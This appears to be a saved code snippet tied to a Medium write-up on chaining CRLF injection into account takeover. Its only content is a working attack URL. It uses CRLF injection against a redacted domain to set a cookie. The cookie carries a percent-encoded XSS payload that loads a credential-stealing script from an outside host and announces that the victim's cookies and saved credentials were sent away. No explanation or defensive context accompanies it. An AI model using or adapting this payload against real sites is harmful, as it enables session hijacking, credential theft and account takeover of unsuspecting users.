CRLF to Account takeover (chaining bugs) | by MoSec | Jul, 2022 | Medium

Wed Jul 20 2022 14:23:37 GMT+0000 (Coordinated Universal Time)

Saved by @pirate

HTTP://crlfsub.redacted.com/%0a%0dSet-Cookie:vset=%74%65%73%74%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%6f%62%78%73%73%2e%73%65%72%76%65%72%2e%63%6f%6d%2f%73%74%65%61%6c%5f%63%72%65%64%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e%3c%69%6d%67%20%73%72%63%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28'%74%68%69%73%5f%69%73%5f%78%73%73%5f%74%6f%5f%41%54%4f%5f%79%6f%75%72%5f%63%6f%6f%6b%69%65%73%5f%61%6e%64%5f%73%61%76%65%64%5f%63%72%65%64%73%5f%68%61%73%5f%62%65%65%6e%5f%73%65%6e%74%5f%74%6f%5f%6d%6f%73%65%63%5f%73%65%72%76%65%72%5f%73%6f%5f%79%6f%75%5f%61%72%65%5f%70%77%6e%65%64'%29%3e%22;path=/;domain=.redacted.com;articles/some-articles

https://medium.com/@moSec/crlf-to-account-takeover-chaining-bugs-21a25dfa1cdf#id_token